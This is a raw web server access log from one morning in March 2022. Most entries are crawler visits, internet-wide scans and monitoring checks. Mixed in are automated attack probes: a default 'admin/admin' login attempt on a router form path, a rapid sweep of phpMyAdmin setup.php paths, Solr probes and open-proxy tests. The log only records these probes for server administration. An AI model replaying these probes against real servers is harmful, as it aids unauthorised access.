78.220.160.61 - - [01/Mar/2022:05:01:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
49.7.20.75 - - [01/Mar/2022:05:04:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
183.136.226.3 - - [01/Mar/2022:05:05:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.226.3 - - [01/Mar/2022:05:06:04 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
222.186.19.235 - - [01/Mar/2022:05:06:59 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.9 Safari/525.19"
222.186.19.235 - - [01/Mar/2022:05:06:59 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3"
222.186.19.235 - - [01/Mar/2022:05:06:59 +0100] "\x16\x03\x01" 501 318 "-" "-"
167.94.138.47 - - [01/Mar/2022:05:08:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.47 - - [01/Mar/2022:05:08:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.47 - - [01/Mar/2022:05:08:26 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
200.192.156.146 - - [01/Mar/2022:05:09:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
45.137.23.152 - - [01/Mar/2022:05:09:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
49.7.20.75 - - [01/Mar/2022:05:13:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
154.88.26.204 - - [01/Mar/2022:05:15:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
154.88.26.204 - - [01/Mar/2022:05:16:05 +0100] "\x16\x03\x01" 501 318 "-" "-"
154.88.26.204 - - [01/Mar/2022:05:16:08 +0100] "\x16\x03\x01" 501 318 "-" "-"
154.88.26.204 - - [01/Mar/2022:05:16:23 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
154.88.26.204 - - [01/Mar/2022:05:16:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
154.88.26.204 - - [01/Mar/2022:05:16:57 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
154.88.26.204 - - [01/Mar/2022:05:16:58 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
31.210.20.234 - - [01/Mar/2022:05:19:52 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
178.73.215.171 - - [01/Mar/2022:05:23:07 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
156.200.194.17 - - [01/Mar/2022:05:23:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.69.18.156 - - [01/Mar/2022:05:23:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.189.182.234 - - [01/Mar/2022:05:24:39 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
185.189.182.234 - - [01/Mar/2022:05:25:56 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
31.210.20.234 - - [01/Mar/2022:05:27:37 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
175.107.19.246 - - [01/Mar/2022:05:29:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
45.93.201.29 - - [01/Mar/2022:05:31:07 +0100] "\x03" 501 316 "-" "-"
49.7.20.75 - - [01/Mar/2022:05:31:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
195.37.190.89 - - [01/Mar/2022:05:31:45 +0100] "GET /IPis/212.91.246.80 HTTP/1.1" 404 341 "-" "Mozilla/5.0 zgrab/0.x"
45.93.201.29 - - [01/Mar/2022:05:32:11 +0100] "\x03" 501 316 "-" "-"
45.93.201.29 - - [01/Mar/2022:05:33:31 +0100] "\x03" 501 316 "-" "-"
45.93.201.29 - - [01/Mar/2022:05:33:50 +0100] "\x03" 501 316 "-" "-"
189.243.244.187 - - [01/Mar/2022:05:33:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
45.93.201.29 - - [01/Mar/2022:05:34:08 +0100] "\x03" 501 316 "-" "-"
45.93.201.29 - - [01/Mar/2022:05:35:13 +0100] "\x03" 501 316 "-" "-"
45.93.201.29 - - [01/Mar/2022:05:38:32 +0100] "\x03" 501 316 "-" "-"
45.93.201.29 - - [01/Mar/2022:05:38:43 +0100] "\x03" 501 316 "-" "-"
45.93.201.29 - - [01/Mar/2022:05:38:49 +0100] "\x03" 501 316 "-" "-"
45.93.201.29 - - [01/Mar/2022:05:39:27 +0100] "\x03" 501 316 "-" "-"
185.189.182.234 - - [01/Mar/2022:05:40:09 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
78.11.1.189 - - [01/Mar/2022:05:43:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
110.137.103.90 - - [01/Mar/2022:05:44:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
185.189.182.234 - - [01/Mar/2022:05:51:28 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
15.204.130.187 - - [01/Mar/2022:05:55:11 +0100] "GET / HTTP/1.1" 200 1229 "http://212.91.246.81:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
31.210.20.234 - - [01/Mar/2022:05:55:13 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
178.73.215.171 - - [01/Mar/2022:05:58:34 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
185.189.182.234 - - [01/Mar/2022:05:59:47 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
185.189.182.234 - - [01/Mar/2022:06:01:34 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
178.73.215.171 - - [01/Mar/2022:06:07:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
31.210.20.234 - - [01/Mar/2022:06:16:28 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
185.189.182.234 - - [01/Mar/2022:06:16:58 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
188.239.65.84 - - [01/Mar/2022:06:17:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
45.137.23.152 - - [01/Mar/2022:06:23:41 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
222.186.19.235 - - [01/Mar/2022:06:24:24 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.544.0 Safari/534.10"
222.186.19.235 - - [01/Mar/2022:06:24:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
222.186.19.235 - - [01/Mar/2022:06:24:24 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16"
34.77.162.10 - - [01/Mar/2022:06:26:49 +0100] "\x16\x03\x01" 501 318 "-" "-"
178.73.215.171 - - [01/Mar/2022:06:29:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
112.248.83.140 - - [01/Mar/2022:06:31:09 +0100] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 324 "-" "-"
45.137.23.152 - - [01/Mar/2022:06:34:32 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
31.210.20.234 - - [01/Mar/2022:06:35:18 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
45.137.23.152 - - [01/Mar/2022:06:38:48 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
165.154.44.158 - - [01/Mar/2022:06:40:20 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
181.49.47.190 - - [01/Mar/2022:06:40:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
184.82.64.99 - - [01/Mar/2022:06:48:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
80.82.77.139 - - [01/Mar/2022:06:48:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
80.82.77.139 - - [01/Mar/2022:06:48:33 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
80.82.77.139 - - [01/Mar/2022:06:48:33 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
80.82.77.139 - - [01/Mar/2022:06:48:33 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
80.82.77.139 - - [01/Mar/2022:06:48:34 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
35.233.62.116 - - [01/Mar/2022:06:48:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
118.193.40.46 - - [01/Mar/2022:06:49:54 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
45.137.23.152 - - [01/Mar/2022:06:52:19 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
178.73.215.171 - - [01/Mar/2022:06:52:58 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
185.189.182.234 - - [01/Mar/2022:06:55:03 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
45.137.23.152 - - [01/Mar/2022:06:58:31 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [01/Mar/2022:07:00:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [01/Mar/2022:07:01:05 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [01/Mar/2022:07:01:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.189.182.234 - - [01/Mar/2022:07:01:53 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [01/Mar/2022:07:02:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:03:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.73.215.171 - - [01/Mar/2022:07:04:20 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Mar/2022:07:04:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:05:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:06:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:07:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:08:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:09:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:10:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:11:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
222.186.19.235 - - [01/Mar/2022:07:11:35 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.8 (KHTML, like Gecko) Chrome/6.0.397.0 Safari/533.8"
222.186.19.235 - - [01/Mar/2022:07:11:35 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.343.0 Safari/533.2"
167.94.146.57 - - [01/Mar/2022:07:11:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.57 - - [01/Mar/2022:07:11:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.57 - - [01/Mar/2022:07:11:56 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [01/Mar/2022:07:12:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:13:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:14:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:15:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:16:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.191.125.35 - - [01/Mar/2022:07:16:53 +0100] "HEAD http://112.124.42.80:63435/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:07:17:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
111.224.220.138 - - [01/Mar/2022:07:17:22 +0100] "HEAD http://110.242.68.4/ HTTP/1.1" 200 - "-" "Mozilla/4.01707650 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
221.213.75.9 - - [01/Mar/2022:07:17:23 +0100] "CONNECT www.so.com:443 HTTP/1.1" 405 340 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
49.113.103.138 - - [01/Mar/2022:07:17:23 +0100] "GET http://www.minghui.org/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
101.68.4.231 - - [01/Mar/2022:07:17:24 +0100] "CONNECT www.voanews.com:443 HTTP/1.1" 405 345 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
113.128.173.155 - - [01/Mar/2022:07:17:24 +0100] "GET http://dongtaiwang.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
220.200.165.180 - - [01/Mar/2022:07:17:24 +0100] "GET http://www.epochtimes.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
112.80.136.56 - - [01/Mar/2022:07:17:25 +0100] "GET http://www.rfa.org/english/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
182.138.137.13 - - [01/Mar/2022:07:17:27 +0100] "CONNECT www.baidu.com:443 HTTP/1.1" 405 343 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
125.76.177.84 - - [01/Mar/2022:07:17:27 +0100] "GET http://www.wujieliulan.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
121.29.178.154 - - [01/Mar/2022:07:17:28 +0100] "GET http://www.soso.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
112.94.253.210 - - [01/Mar/2022:07:17:28 +0100] "CONNECT cn.bing.com:443 HTTP/1.1" 405 341 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
45.137.23.152 - - [01/Mar/2022:07:18:16 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [01/Mar/2022:07:18:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:19:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:20:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.77.162.13 - - [01/Mar/2022:07:20:57 +0100] "\x16\x03\x01" 501 318 "-" "-"
185.189.182.234 - - [01/Mar/2022:07:21:15 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [01/Mar/2022:07:21:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.194 - - [01/Mar/2022:07:21:49 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.137.23.152 - - [01/Mar/2022:07:22:12 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
178.73.215.171 - - [01/Mar/2022:07:22:13 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Mar/2022:07:22:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:23:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:24:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:25:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:26:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:27:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:28:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.221.192.26 - - [01/Mar/2022:07:28:35 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.53.194 - - [01/Mar/2022:07:29:13 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:07:29:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:30:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:31:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:32:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.61.19 - - [01/Mar/2022:07:33:13 +0100] "GET http://212.91.246.81:80phpMyAdmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:14 +0100] "GET http://212.91.246.81:80phpmyadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:14 +0100] "GET http://212.91.246.81:80pma/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:14 +0100] "GET http://212.91.246.81:80myadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:15 +0100] "GET http://212.91.246.81:80MyAdmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:16 +0100] "GET http://212.91.246.81:80PHPMYADMIN/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:16 +0100] "GET http://212.91.246.81:80mysqladmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:16 +0100] "GET http://212.91.246.81:80SQL/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:17 +0100] "GET http://212.91.246.81:80phpadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:17 +0100] "GET http://212.91.246.81:80phpm/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:18 +0100] "GET http://212.91.246.81:80phpmyadmin1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:18 +0100] "GET http://212.91.246.81:80phpMyAdmin1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:19 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:19 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:20 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:20 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
212.91.246.72 - - [01/Mar/2022:07:33:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.61.19 - - [01/Mar/2022:07:33:21 +0100] "GET http://212.91.246.81:80php-my-admin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:21 +0100] "GET http://212.91.246.81:80admin/pma/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:22 +0100] "GET http://212.91.246.81:80phpMyAdmin-2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
